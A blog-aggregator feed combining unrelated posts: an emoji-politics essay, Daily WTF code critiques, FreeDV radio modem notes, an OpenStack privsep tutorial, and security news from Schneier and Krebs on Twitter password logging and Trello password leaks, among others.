Sociological ImagesPocket-sized Politics

Major policy issues like gun control often require massive social and institutional changes, but many of these issues also have underlying cultural assumptions that make the status quo seem normal. By following smaller changes in the way people think about issues, we can see gradual adjustments in our culture that ultimately make the big changes more plausible.

Photo Credit: Emojipedia

For example, today’s gun debate even drills down to the little cartoons on your phone. There’s a whole process for proposing and reviewing new emoji, but different platforms have their own control over how they design the cartoons in coordination with the formal standards. Last week, Twitter pointed me to a recent report from Emojipedia about platform updates to the contested “pistol” emoji, moving from a cartoon revolver to a water pistol:

In an update to the original post, all major vendors have committed to this design change for “cross-platform compatibility.”

There are a couple ways to look at this change from a sociological angle. You could tell a story about change from the bottom-up, through social movements like the March For Our Lives, calling for gun reform in the wake of mass shootings. These movements are drawing attention to the way guns permeate American culture, and their public visibility makes smaller choices about the representation of guns more contentious. Apple didn’t comment directly on the intentions behind the redesign when it came out, but it has weighed in on the politics of emoji design in the past.

You could also tell a story about change from the top-down, where large tech companies have looked to copy Apple’s innovation for consistency in a contentious and uncertain political climate (sociologists call this “institutional isomorphism”). In the diagram, you can see how Apple’s early redesign provided an alternative framework for other companies to take up later on, just like Google and Microsoft adopted the dominant pistol design in earlier years.

Either way, if you favor common sense gun reform, redesigning emojis is obviously not enough. But cases like this help us understand how larger shifts in social norms are made up of many smaller changes that challenge the status quo.

Evan Stewart is a Ph.D. candidate in sociology at the University of Minnesota. You can follow him on Twitter.

(View original at https://thesocietypages.org/socimages)

Worse Than FailureCodeSOD: CHashMap

There’s a phenomenon I think of as the “evolution of objects” and it impacts novice programmers. They start by having piles of variables named things like userName0, userName1, accountNum0, accountNum1, etc. This is awkward and cumbersome, and then they discover arrays. string* userNames, int[] accountNums. This is also awkward and cumbersome, and then they discover hash maps, and can do something like Map<string, string>* users. Most programmers go on to discover “wait, objects do that!”
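
For what it’s worth, here is a minimal sketch of where that progression ends up (in Python purely for brevity, and with made-up field names; the code under discussion below is C++):

    # One record type instead of parallel arrays or a map of maps.
    from dataclasses import dataclass

    @dataclass
    class User:
        user_name: str
        account_num: int

    users = [User("alice", 1001), User("bob", 1002)]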

Not so Brian’s co-worker, Dagny. Dagny wanted to write some C++, but didn’t want to learn that pesky STL or have to master templates. Dagny also considered themselves a “performance junkie”, so they didn’t want to bloat their codebase with peer-reviewed and optimized code, and instead decided to invent that wheel themselves.

Thus was born CHashMap. Now, Brian didn’t do us the favor of including any of the implementation of CHashMap, claiming he doesn’t want to “subject the readers to the nightmares that would inevitably arise from viewing this horror directly”. Important note for submitters: we want those nightmares.

Instead, Brian shares with us how the CHashMap is used, and from that we can infer a great deal about how it was implemented. First, let’s simply look at some declarations:

    CHashMap bills;
    CHashMap billcols;
    CHashMap summary;
    CHashMap billinfo;

Note that CHashMap does not take any type parameters. This is because it’s “type ignorant”, which is like being type agnostic, but with more char*. For example, if you want to get, say, the “amount_due” field, you might write code like this:

    double amount = 0;
    amount = Atof(bills.Item("amount_due"));

Yes, everything, keys and values, is simply a char*. And, as a bonus, in the interests of code clarity, we can see that Dagny didn’t do anything dangerous, like overload the [] operator. It would certainly be confusing to be able to index the hash map like it were any other collection type.

Now, since everything is stored as a char*, it’s onto you to convert it back to the right type, but since chars are just bytes if you don’t look too closely… you can store anything at that pointer. So, for example, if you wanted to get all of a user’s billing history, you might do something like this…

    CHashMap bills;
    CHashMap billcols;
    CHashMap summary;
    CHashMap billinfo;

    int nbills = dbQuery (query, bills, billcols);
    if (nbills > 0) {
        // scan the bills for amounts and/or issues
        double amount;
        double amountDue = 0;
        int unresolved = 0;

        for (int r=0; r<nbills; r++) {
            if (Strcmp(bills.Item("payment_status",r),BILL_STATUS_REMITTED) != 0) {
                billinfo.Clear();
                amount = Atof(bills.Item("amount_due",r));
                if (amount >= 0) {
                    amountDue += amount;
                    if (Strcmp(bills.Item("status",r),BILL_STATUS_WAITING) == 0) {
                        unresolved += 1;
                        billinfo.AddItem ("duedate", FormatTime("YYYY-MM-DD hh:mm:ss",cvtUTC(bills.Item("due_date",r))));
                        billinfo.AddItem ("biller", bills.Item("account_display_name",r));
                        billinfo.AddItem ("account", bills.Item("account_number",r));
                        billinfo.AddItem ("amount", amount);
                    }
                }
                else {
                    amountDue += 0;
                    unresolved += 1;
                    billinfo.AddItem ("duedate", FormatTime("YYYY-MM-DD hh:mm:ss",cvtUTC(bills.Item("due_date",r))));
                    billinfo.AddItem ("biller", bills.Item("account_display_name",r));
                    billinfo.AddItem ("account", bills.Item("account_number",r));
                    billinfo.AddItem ("amount", "???");
                }
                summary.AddItem ("", &billinfo);
            }
        }
    }

Look at that summary.AddItem ("", &billinfo) line. Yes, that is an empty key. Yes, they’re pointing it at a reference to the billinfo (which also gets Clear()ed a few lines earlier, so I have no idea what’s happening there). And yes, they’re doing this assignment in a loop, but don’t worry! CHashMap allows multiple values per key! That "" key will hold everything.

So, you have multi-value keys which can themselves point to nested CHashMaps, which means you don’t need any complicated JSON or XML classes, you can just use CHashMap as your hammer/foot-gun.

    //code which fetches account details from JSON
    CHashMap accounts;
    CHashMap details;
    CHashMap keys;

    rc = getAccounts (userToken, accounts);
    if (rc == 0) {
        for (int a=1; a<=accounts.Count(); a++) {
            cvt.jsonToKeys (accounts.Item(a), keys);
            rc = getAccountDetails (userToken, keys.Item("accountId"), details);
        }
    }
    // Details of getAccounts
    int getAccounts (const char * user, CHashMap& rows) {
      // <snip>
      AccountClass account;
      for (int a=1; a<=count; a++) {
        // Populate the account class
        // <snip>
        rows.AddItem ("", account.jsonify(t));
      }

With this kind of versatility, is it any surprise that pretty much every function in the application depends on a CHashMap somehow? If that doesn’t prove its utility, I don’t know what will. How could you do anything better? Use classes? Don’t make me laugh!

As a bonus, remember this line above? billinfo.AddItem ("duedate", FormatTime("YYYY-MM-DD hh:mm:ss",cvtUTC(bills.Item("due_date",r))))? Well, Brian has this to add:

it’s worth mentioning that our DB stores dates in the typical format: “YYYY-MM-DD hh:mm:ss”. cvtUTC is a function that converts a date-time string to a time_t value, and FormatTime converts a time_t to a date-time string.

[Advertisement] ProGet can centralize your organization's software applications and components to provide uniform access to developers and servers. Check it out!

,

Planet Linux AustraliaDavid Rowe: FreeDV 700D and SSB Comparison

Mark, VK5QI has just performed a SSB versus FreeDV 700D comparison between his home in Adelaide and the Manly Warringah Radio Society WebSDR in Sydney, about 1200km away. The band was 40m, and the channel very poor, with some slow fading. Mark used SVN revision 3581, which he built himself on Ubuntu, with an interleaver setting (Tools-Options menu) of 1 frame. Transmit power for SSB and FreeDV 700D was about the same.

I’m still finishing off FreeDV 700D integration and tuning the mode – but this is a very encouraging start. Thanks Mark!

Don MartiUnlocking the hidden European mode in web ads

It would make me really happy to be able to yellow-list Google web ads in Privacy Badger. (Yellow-listed domains are not blocked, but have their cookies restricted in order to cut back on cross-site tracking.) That's because a lot of news and cultural sites use DoubleClick for Publishers and other Google services to deliver legit, context-based advertising. Unfortunately, as far as I can tell, Google mixes in-context ads with crappy, spam-like, targeted stuff. What I want is something like Doc Searls style ads: Just give me ads not based on tracking me.

Until now, there has been no such setting. There could have been, if Do Not Track (DNT) had turned out to be a thing, but no. But there is some good news. Instead of one easy-to-use DNT, sites are starting to give us harder-to-find, but still usable, settings, in order to enable GDPR-compliant ads for Europe. Here's Google's: Ads personalization settings in Google’s publisher ad tags - DoubleClick for Publishers Help.

Wait a minute? Google respects DNT now?

Sort of. GDPR-compliant terms written by Google aren't exactly the same as EFF's privacy-friendly Do Not Track (DNT) Policy (all these different tracking policies are reminding me of open source licenses for some reason), but close enough. The catch is that as an end user, you can't just turn on Google's European mode. You have to do some JavaScript. I think I figured out how to do this in a simple browser extension to unlock secret European status.

Google doesn't appear to have their European mode activated yet, so I added a do-nothing "European mode" to the Aloodo project, for testing. I'm not able to yellow-list Google yet, but when GDPR takes effect later this month I'll test it some more.

In the meantime, I'll keep looking for other examples of hidden European mode, and see if I can figure out how to activate them.

,

Rondam RamblingsIn your face, liberal haters!

The New York Times reports that California is now the world's 5th largest economy.  Only the U.S. as a whole, China, Japan and Germany are bigger.  On top of that, the vast majority of that growth came from the coastal areas, where the liberals live. Meanwhile, in Kansas, the Republican experiment in stimulating economic growth by cutting taxes has gone down in screaming flames: The experiment with

,

CryptogramFriday Squid Blogging: US Army Developing 3D-Printable Battlefield Robot Squid

The next major war will be super weird.

As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered.

Read my blog posting guidelines here.

Planet Linux AustraliaDavid Rowe: FreeDV 1600 Sample Clock Offset Bug

So I’m busy integrating FreeDV 700D into the FreeDV GUI program. The 700D modem works on larger frames (160ms) than the previous modes (e.g. 20ms for FreeDV 1600) so I need to adjust FIFO sizes.

As a reference I tried FreeDV 1600 between two laptops (one tx, one rx) and noticed it was occasionally losing frame sync, generating bit errors, and producing the occasional bloop in the audio. After a little head scratching I discovered a bug in the FreeDV 1600 FDMDV modem! Boy, is my face red.

The FDMDV modem was struggling with sample clock differences between the mod and demod. I think the bug was introduced when I did some (too) clever refactoring to reduce FDMDV memory consumption while developing the SM1000 back in 2014!

Fortunately I have a trail of unit test programs, leading back from FreeDV GUI, to the FreeDV API (freedv_tx and freedv_rx), then individual unit tests for each modem (fdmdv_mod/fdmdv_demod), and finally Octave simulation code (fdmdv.m, fdmdv_demod.m and friends) for the modem.

Octave (or an equivalent vector based scripting language like Python/numpy) is much easier to work with than C for complex DSP problems. So after a little work I reproduced the problem using the Octave version of the FDMDV modem – bit errors happening every time there was a timing jump.

The modulator sends parallel streams of symbols at about 50 baud. These symbols are output at a sample rate of 8000 Hz. Part of the demodulator’s job is to estimate the best place to sample each received modem symbol; this is called timing estimation. When the tx and rx are separate, the two sample clocks are slightly different – your 8000 Hz clock will be a few Hz different to mine. This means the timing estimate is a moving target, and occasionally we need to compensate by taking a few more or a few fewer samples from the 8000 Hz sample stream.

In the plot below the Octave demodulator was fed with a signal that is transmitted at 8010 Hz instead of the nominal 8000 Hz. So the tx is sampling faster than the rx. The y axis is the timing estimate in samples, x axis time in seconds. For FreeDV 1600 there are 160 samples per symbol (50 baud at 8 kHz). The timing estimate at the rx drifts forwards until we hit a threshold, set at +/- 40 samples (quarter of a symbol). To avoid the timing estimate drifting too far, we take a one-off larger block of samples from the input, the timing takes a step backwards, then starts drifting up again.
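
As a rough back-of-envelope check (my own arithmetic based on the figures quoted above, not output from the modem), the drift rate and the interval between those timing corrections work out like this:

    # Rough estimate of timing drift for a 10 Hz sample clock offset.
    # The sample rates and the +/- 40 sample threshold come from the text
    # above; the rest is back-of-envelope arithmetic, not modem code.
    nominal_fs = 8000.0   # Hz, receiver sample rate
    tx_fs = 8010.0        # Hz, simulated transmitter sample rate
    threshold = 40        # samples, +/- limit on the timing estimate

    drift_per_second = tx_fs - nominal_fs   # about 10 samples/s of slip
    # Assumes the estimate traverses the full +/- window between steps.
    seconds_between_steps = (2 * threshold) / drift_per_second

    print("drift: %.1f samples/s" % drift_per_second)
    print("timing correction roughly every %.1f s" % seconds_between_steps)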

Back to the bug. After some head scratching, messing with buffer shifts, and rolling back phases I eventually fixed the problem in the Octave code. Next step is to port the code to C. I used my test framework that automatically compares a bunch of vectors (states) in the Octave code to the equivalent C code:

octave:8> system("../build_linux/unittest/tfdmdv")
sizeof FDMDV states: 40032 bytes
ans = 0
octave:9> tfdmdv
tx_bits..................: OK
tx_symbols...............: OK
tx_fdm...................: OK
pilot_lut................: OK
pilot_coeff..............: OK
pilot lpf1...............: OK
pilot lpf2...............: OK
S1.......................: OK
S2.......................: OK
foff_coarse..............: OK
foff_fine................: OK
foff.....................: OK
rxdec filter.............: OK
rx filt..................: OK
env......................: OK
rx_timing................: OK
rx_symbols...............: OK
rx bits..................: OK
sync bit.................: OK
sync.....................: OK
nin......................: OK
sig_est..................: OK
noise_est................: OK

passes: 46 fails: 0

Great! This system really lets me move fast once the Octave code is written and tested. Next step is to test the C version of the FDMDV modem from the command line. Note how I used sox to insert a sample rate offset by changing the sample rate of the raw sample stream:

build_linux/src$ ./fdmdv_get_test_bits - 30000 | ./fdmdv_mod - - | sox -t raw -r 8000 -s -2 - -t raw -r 7990 - | ./fdmdv_demod - - 14 demod_dump.txt | ./fdmdv_put_test_bits -
-----------------+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
bits 29568  errors 0  BER 0.0000

Zero errors, despite 10Hz sample clock offset. Yayyyyy. The C demodulator outputs a bunch of vectors that can be plotted with an Octave helper program:

octave:6> fdmdv_demod_c("../build_linux/src/demod_dump.txt",28000)

The FDMDV modem is integrated with Codec 2 in the FreeDV API. This can be tested using the freedv_tx/freedv_rx programs. For convenience, I generated some 60 second test files at different sample rates. Here is how I test using the freedv_rx program:

./freedv_rx 1600 ~/Desktop/ve9qrp_1600_8010.raw - | aplay -f S16

The output audio sounds good, no bloops, and by examining the freedv_rx_log.txt file I can see the demodulator didn’t lose sync. Cool.

Here are the samples I used for testing:

No clock offset
Simulates Tx sample rate 10Hz slower than Rx
Simulates Tx sampling 10Hz faster than Rx

Finally, the FreeDV API is linked with the FreeDV GUI program. Here is a video of me testing different sample clock offsets using the raw files in the table above. Note there is no audio in this video as my screen recorder fights with FreeDV for use of sound cards. However the decoded FreeDV audio should be uninterrupted, there should be no re-syncs, and zero bit errors:

The fix has been checked into codec2-dev SVN rev 3556, and will make its way into FreeDV GUI 1.3, to be released in late May 2018.

Reading Further

FDMDV modem
README_fdmdv.txt
Steve Ports an OFDM modem from Octave to C, some more on the Octave/C automated test framework and porting complex DSP algorithms.
Testing a FDMDV Modem. Early blog post on FDMDV modem with some more discussion on sample clock offsets
Timing Estimation for PSK modems, talks a little about how we generate a timing estimate

CryptogramDetecting Laptop Tampering

Micah Lee ran a two-year experiment designed to detect whether or not his laptop was ever tampered with. The results are inconclusive, but demonstrate how difficult it can be to detect laptop tampering.

Worse Than FailureError'd: Version-itis

"No thanks, I'm holding out for version greater than or equal to 3.6 before upgrading," writes Geoff G.

 

"Looks like Twilio sent me John Doe's receipt by mistake," wrote Charles L.

 

"Little do they know that I went back in time and submitted my resume via punch card!" Jim M. writes.

 

Richard S. wrote, "I went to request a password reset from an old site that is sending me birthday emails, but it looks like the reCAPTCHA is no longer available and the site maintainers have yet to notice."

 

"It's nice to see that this new Ultra Speed Plus™ CD burner lives up to its name, but honestly, I'm a bit scared to try some of these," April K. writes.

 

"Sometimes, like Samsung's website, you have to accept that it's just ok to fail sometimes," writes Alessandro L.

 

[Advertisement] ProGet supports your applications, Docker containers, and third-party packages, allowing you to enforce quality standards across all components. Download and see how!

Planet Linux AustraliaSimon Lyall: Audiobooks – April 2018

Viking Britain: An Exploration by Thomas Williams

Pretty straightforward. Covers the up-to-date research (no Winged Helmets 😢) and is easy to follow (easier if you have a map of the UK) 7/10

Contact by Carl Sagan

I’d forgotten how different it was from the movie in places. A few extra characters and plot twists, and many more details and explanations of the science. 8/10

The Path Between the Seas: The Creation of the Panama Canal, 1870-1914 by David McCullough

My monthly McCullough book. Great as usual. Good picture of the project and people. 8/10

Winter World: The Ingenuity of Animal Survival by Bernd Heinrich

As per the title this spends much of the time on [varied strategies for] Winter adaptation vs Summer World’s more general coverage. A great listen 8/10

A Man on the Moon: The Voyages of the Apollo Astronauts by Andrew Chaikin

Great overview of the Apollo missions. The Author interviewed almost all the astronauts. Lots of details about the missions. Excellent 9/10

Walkaway by Cory Doctorow

Near future Sci Fi. Similar feel to some of his other books like Makers. Switches between characters & audiobook switches narrators to match. Fastforward the Sex Scenes 💤. Mostly works 7/10

The Neanderthals Rediscovered: How Modern Science Is Rewriting Their Story by Michael A. Morse

Pretty much what the subtitle advertises. Covers discoveries from the last 20 years which make other books out of date. Tries to be Neanderthals-only. 7/10

The Great Quake: How the Biggest Earthquake in North America Changed Our Understanding of the Planet by Henry Fountain

Straightforward story of the 1964 Alaska Earthquake. Follows half a dozen characters & concentrates on worst damaged areas. 7/10

Share

Rondam RamblingsI don't know where I'm a gonna go when the volcano blows

Hawaii's Kilauea volcano is erupting.  So is one in Vanuatu.  And there is increased activity in Yellowstone.  Hang on to your hats, folks, Jesus's return must be imminent. (In case you didn't know, the title is a line from a Jimmy Buffett song.)

,

Planet Linux AustraliaMichael Still: How to make a privileged call with oslo privsep

Share

Once you’ve added oslo privsep to your project, how do you make a privileged call? It’s actually really easy to do. In this post I will assume you already have privsep running for your project, which at the time of writing limits you to OpenStack Nova in the OpenStack universe.

The first step is to write the code that will run with escalated permissions. In Nova, we have chosen to only have one set of escalated permissions, so it’s easy to decide which set to use. I’ll document how we reached that decision and alternative approaches in another post.

In Nova, all code that runs with escalated permissions is in the nova/privsep directory, which is a pattern I’d like to see repeated in other projects. This is partially because privsep maintains a whitelist of methods that are allowed to be run this way, but it’s also because it makes it very obvious to callers that the code being called is special in some way.

Let’s assume that we’re going to add a simple method which manipulates the filesystem of a hypervisor node as root. We’d write a method like this in a file inside nova/privsep:

import nova.privsep

...

@nova.privsep.sys_admin_pctxt.entrypoint
def update_motd(message):
    with open('/etc/motd', 'w') as f:
        f.write(message)

This method updates /etc/motd, which is the text which is displayed when a user interactively logs into the hypervisor node. “motd” stands for “message of the day” by the way. Here we just pass a new message of the day which clobbers the old value in the file.

The important thing is that entrypoint decorator at the start of the method. That’s how privsep decides to run this method with escalated permissions, and decides what permissions to use. In Nova at the moment we only have one set of escalated permissions, which we called sys_admin_pctxt because we’re artists. I’ll discuss in a later post how we came to that decision and what the other options were.

We can then call this method from anywhere else in Nova like this:

import nova.privsep.motd

...

nova.privsep.motd.update_motd('This node is currently idle')

Note that we do imports for privsep code slightly differently. We always import the entire path, instead of creating a shortcut to just the module we’re using. In other words, we don’t do:

from nova.privsep import motd

...

motd.update_motd('This node is a banana')

The above code would work, but is frowned on because it is less obvious here that the update_motd() method runs with escalated permissions — you’d have to go and read the imports to tell that.

That’s really all there is to it. The only other thing to mention is that there is a bit of a wart — code with escalated permissions can only use Nova code that is within the privsep directory. That’s been a problem when we’ve wanted to use a utility method from outside that path inside escalated code. The restriction happens for good reasons, so instead what we do in this case is move the utility into the privsep directory and fix up all the other callers to call the new location. It’s not perfect, but it’s what we have for now.

There are some simple review criteria that should be used to assess a patch which implements new code that uses privsep in OpenStack Nova. They are:

  • Don’t use imports which create aliases. Use the “import nova.privsep.motd” form instead.
  • Keep methods with escalated permissions as simple as possible. Remember that these things are dangerous and should be as easy to understand as possible.
  • Calculate paths to manipulate inside the escalated method — so, don’t let someone pass in a full path and the contents to write to that file as root, instead let them pass in the name of the network interface or whatever that you are manipulating and then calculate the path from there. That will make it harder for callers to use your code to clobber random files on the system.
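
To illustrate that last criterion, here is a minimal sketch in the same style as the example above (the method names and the configuration path are made up for illustration; this is not actual Nova code):

import os

import nova.privsep


# Risky: the caller controls the full path, so a compromised caller could use
# this to overwrite arbitrary files as root.
@nova.privsep.sys_admin_pctxt.entrypoint
def write_config_file(path, contents):
    with open(path, 'w') as f:
        f.write(contents)


# Better: the caller only names the interface, and the escalated code decides
# which file that maps to (real code would also validate the name).
@nova.privsep.sys_admin_pctxt.entrypoint
def write_interface_config(interface, contents):
    path = os.path.join('/etc/network/interfaces.d', interface)
    with open(path, 'w') as f:
        f.write(contents)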

Adding new code with escalated permissions is really easy in Nova now, and much more secure and faster than it was when we only had sudo and root command lines to do these sorts of things. Let me know if you have any questions.

Share

The post How to make a privileged call with oslo privsep appeared first on Made by Mikal.

Krebs on SecurityTwitter to All Users: Change Your Password Now!

Twitter just asked all 300+ million users to reset their passwords, citing the exposure of user passwords via a bug that stored passwords in plain text — without protecting them with any sort of encryption technology that would mask a Twitter user’s true password. The social media giant says it has fixed the bug and that so far its investigation hasn’t turned up any signs of a breach or that anyone misused the information. But if you have a Twitter account, please change your account password now.

Or if you don’t trust links in blogs like this (I get it) go to Twitter.com and change it from there. And then come back and read the rest of this. We’ll wait.

In a post to its company blog this afternoon, Twitter CTO Parag Agrawal wrote:

“When you set a password for your Twitter account, we use technology that masks it so no one at the company can see it. We recently identified a bug that stored passwords unmasked in an internal log. We have fixed the bug, and our investigation shows no indication of breach or misuse by anyone.

A message posted this afternoon (and still present as a pop-up) warns all users to change their passwords.

“Out of an abundance of caution, we ask that you consider changing your password on all services where you’ve used this password. You can change your Twitter password anytime by going to the password settings page.”

Agrawal explains that Twitter normally masks user passwords through a state-of-the-art password hashing technology called “bcrypt,” which replaces the user’s password with a random set of numbers and letters that are stored in Twitter’s system.

“This allows our systems to validate your account credentials without revealing your password,” said Agrawal, who says the technology they’re using to mask user passwords is the industry standard.
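
For readers curious what that looks like in practice, here is a minimal sketch (not Twitter’s code; it assumes the third-party bcrypt package for Python) of how bcrypt-style password storage and checking typically works:

    import bcrypt

    # At signup: hash the password once and store only the hash.
    password = b"correct horse battery staple"
    hashed = bcrypt.hashpw(password, bcrypt.gensalt())

    # At login: check the attempt against the stored hash; the plaintext
    # password never needs to be written to a log or a database.
    assert bcrypt.checkpw(b"correct horse battery staple", hashed)
    assert not bcrypt.checkpw(b"wrong guess", hashed)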

“Due to a bug, passwords were written to an internal log before completing the hashing process,” he continued. “We found this error ourselves, removed the passwords, and are implementing plans to prevent this bug from happening again.”

Agrawal wrote that while Twitter has no reason to believe password information ever left Twitter’s systems or was misused by anyone, the company is still urging all Twitter users to reset their passwords NOW.

A letter to all Twitter users posted by Twitter CTO Parag Agrawal

Twitter advises:
-Change your password on Twitter and on any other service where you may have used the same password.
-Use a strong password that you don’t reuse on other websites.
-Enable login verification, also known as two factor authentication. This is the single best action you can take to increase your account security.
-Use a password manager to make sure you’re using strong, unique passwords everywhere.

This may be much ado about nothing disclosed out of an abundance of caution, or further investigation may reveal different findings. It doesn’t matter for right now: If you’re a Twitter user and if you didn’t take my advice to go change your password yet, go do it now! That is, if you can.

Twitter.com seems responsive now, but for some period of time Thursday afternoon Twitter had problems displaying many Twitter profiles, or even its homepage. Just a few moments ago, I tried to visit the Twitter CTO’s profile page and got this (ditto for Twitter.com):

What KrebsOnSecurity and other Twitter users got when we tried to visit twitter.com and the Twitter CTO’s profile page late in the afternoon ET on May 3, 2018.

If for some reason you can’t reach Twitter.com, try again soon. Put it on your to-do list or calendar for an hour from now. Seriously, do it now or very soon.

And please don’t use a password that you have used for any other account you use online, either in the past or in the present. A non-comprehensive list (note to self) of some password tips are here.

I have sent some more specific questions about this incident in to Twitter. More updates as available.

Update, 8:04 p.m. ET: Went to reset my password at Twitter and it said my new password was strong, but when I submitted it I was led to a dead page. But after logging in again at twitter.com the new password worked (and the old didn’t anymore). Then it prompted me to enter one-time code from app (you do have 2-factor set up on Twitter, right?) Password successfully changed!

Rondam RamblingsA quantum mechanics puzzle

Time to take a break from politics and sociology and geek out about quantum mechanics for a while. Consider a riff on a Michelson-style interferometer that looks like this: A source of laser light shines on a half-silvered mirror angled at 45 degrees (the grey rectangle).  This splits the beam in two.  The two beams are in actuality the same color as the original, but I've drawn them in

Google AdsenseUpdated impressions metrics for AdSense

Reporting plays a key role in the AdSense experience. In fact, two-thirds of our partners consider it the most important feature within AdSense. Helping partners understand and improve their performance metrics is a top priority. Today, we’re announcing updates to how we report AdSense impressions.

The Interactive Advertising Bureau (IAB) and the Media Rating Council (MRC) in partnership with other industry bodies such as the Mobile Marketing Association (MMA), periodically review and update industry standards for impression measurement. They recommend guidelines to standardize how impressions are counted across formats and platforms.

What’s changing? 
Over the last year, to remain consistent with these standards, we have transitioned our ad serving platforms from served impressions to downloaded impressions. Served impressions are counted at the point that we find an ad for an ad request on the server. Downloaded impressions are counted for each ad request once at least one of the returned ads has begun to load on the user’s device. Starting today, publishers will see updated metrics in AdSense that reflect this change.
How will it impact partners?
Switching to counting impressions on download helps to improve viewability rates and consistency across measurement providers, and better aligns the impression metric with advertiser value. For example, if an ad failed to download or if the user closed the tab before it arrived, it will no longer be counted as an impression. As a result, some AdSense users might see decreases in their impression counts, and corresponding improvements in their impression RPM, CTR, and other impression-based metrics. Your earnings, however, should not be impacted.
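
As a simple illustration of that last point (made-up numbers, not AdSense data), holding earnings constant while counting fewer impressions mechanically raises impression RPM:

    # Made-up numbers showing why RPM rises when fewer impressions are counted
    # while earnings stay the same.
    earnings = 120.00               # USD for the day
    served_impressions = 60000      # old counting method
    downloaded_impressions = 57000  # new method: some ads never began to load

    rpm_served = earnings / served_impressions * 1000
    rpm_downloaded = earnings / downloaded_impressions * 1000

    print("RPM (served):     $%.2f" % rpm_served)      # $2.00
    print("RPM (downloaded): $%.2f" % rpm_downloaded)  # about $2.11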

We will continue to review and update our impression counting technology as new industry standards are defined and implemented.

For more information please visit our Help Center.

Posted by:
Andrew Gildfind, Product Manager

Cory DoctorowAnnouncing “Petard,” a new science fiction story reading on my podcast

Here’s the first part of my reading (MP3) of Petard, a story from MIT Tech Review’s Twelve Tomorrows, edited by Bruce Sterling; a story inspired by, and dedicated to, Aaron Swartz — about elves, Net Neutrality, dorms and the collective action problem.

MP3

Mark ShuttleworthScam alert

Am writing briefly to say that I believe a scam or pyramid scheme is currently using my name fraudulently in South Africa. I am not going to link to the websites in question here, but if you are being pitched a make-money-fast story that refers to me and crypto-currency, you are most likely being targeted by fraudsters.

CryptogramLC4: Another Pen-and-Paper Cipher

Interesting symmetric cipher: LC4:

Abstract: ElsieFour (LC4) is a low-tech cipher that can be computed by hand; but unlike many historical ciphers, LC4 is designed to be hard to break. LC4 is intended for encrypted communication between humans only, and therefore it encrypts and decrypts plaintexts and ciphertexts consisting only of the English letters A through Z plus a few other characters. LC4 uses a nonce in addition to the secret key, and requires that different messages use unique nonces. LC4 performs authenticated encryption, and optional header data can be included in the authentication. This paper defines the LC4 encryption and decryption algorithms, analyzes LC4's security, and describes a simple appliance for computing LC4 by hand.

Almost two decades ago I designed Solitaire, a pen-and-paper cipher that uses a deck of playing cards to store the cipher's state. LC4, by contrast, uses specialized tiles. This gives the cipher designer more options, but it can be incriminating in a way that regular playing cards are not.

Still, I like seeing more designs like this.

Hacker News thread.

Worse Than FailureCodeSOD: The Same Date

Oh, dates. Oh, dates in Java. They’re a bit of a dangerous mess, at least prior to Java 8. That’s why Java 8 created its own date-time libraries, and why JodaTime was the gold standard in Java date handling for many years.

But it doesn’t really matter what date handling you do if you’re TRWTF. An Anonymous submitter passed along this method, which is meant to set the start and end date of a search range, based on a number of days:

private void setRange(int days){
        DateFormat df = new SimpleDateFormat("yyyy-MM-dd")
        Date d = new Date();
        Calendar c = Calendar.getInstance()
        c.setTime(d);

        Date start =  c.getTime();

        if(days==-1){
                c.add(Calendar.DAY_OF_MONTH, -1);
                assertThat(c.getTime()).isNotEqualTo(start)
        }
        else if(days==-7){
                c.add(Calendar.DAY_OF_MONTH, -7)
                assertThat(c.getTime()).isNotEqualTo(start)
        }
        else if (days==-30){
                c.add(Calendar.DAY_OF_MONTH, -30)
                assertThat(c.getTime()).isNotEqualTo(start)
        }
        else if (days==-365){
                c.add(Calendar.DAY_OF_MONTH, -365)
                assertThat(c.getTime()).isNotEqualTo(start)
        }

        from = df.format(start).toString()+"T07:00:00.000Z"
        to = df.format(d).toString()+"T07:00:00.000Z"
}

Right off the bat, days only has a handful of valid values- a day, a week, a month(ish) or a year(ish). I’m sure passing it as an int would never cause any confusion. The fact that they don’t quite grasp what variables are for is a nice touch. I’m also quite fond of how they declare a date format at the top, but then also want to append a hard-coded timezone to the format, which again, I’m sure will never cause any confusion or issues. The assertThat calls check that the Calendar.add method does what it’s documented to do, making those both pointless and stupid.

But that’s all small stuff. The real magic is that they never actually use the calendar after adding/subtracting dates. They obviously meant to include d = c.getTime() someplace, but forgot. Then, without actually testing the code (they have so many asserts, why would they need to test?) they checked it in. It wasn’t until QA was checking the prerelease build that anyone noticed, “Hey, filtering by dates doesn’t work,” and an investigation revealed that from and to always had the same value.

[Advertisement] Forget logs. Next time you're struggling to replicate error, crash and performance issues in your apps - Think Raygun! Installs in minutes. Learn more.

,

Krebs on SecurityWhen Your Employees Post Passwords Online

Storing passwords in plaintext online is never a good idea, but it’s remarkable how many companies have employees who are doing just that using online collaboration tools like Trello.com. Last week, KrebsOnSecurity notified a host of companies that employees were using Trello to share passwords for sensitive internal resources. Among those put at risk by such activity included an insurance firm, a state government agency and ride-hailing service Uber.

By default, Trello boards for both enterprise and personal use are set to either private (requires a password to view the content) or team-visible only (approved members of the collaboration team can view).

But that doesn’t stop individual Trello users from manually sharing personal boards that include proprietary employer data, information that may be indexed by search engines and available to anyone with a Web browser. And unfortunately for organizations, far too many employees are posting sensitive internal passwords and other resources on their own personal Trello boards that are left open and exposed online.

A personal Trello board created by an Uber employee included passwords that might have exposed sensitive internal company operations.

KrebsOnSecurity spent the past week using Google to discover unprotected personal Trello boards that listed employer passwords and other sensitive data. Pictured above was a personal board set up by some Uber developers in the company’s Asia-Pacific region, which included passwords needed to view a host of internal Google Documents and images.

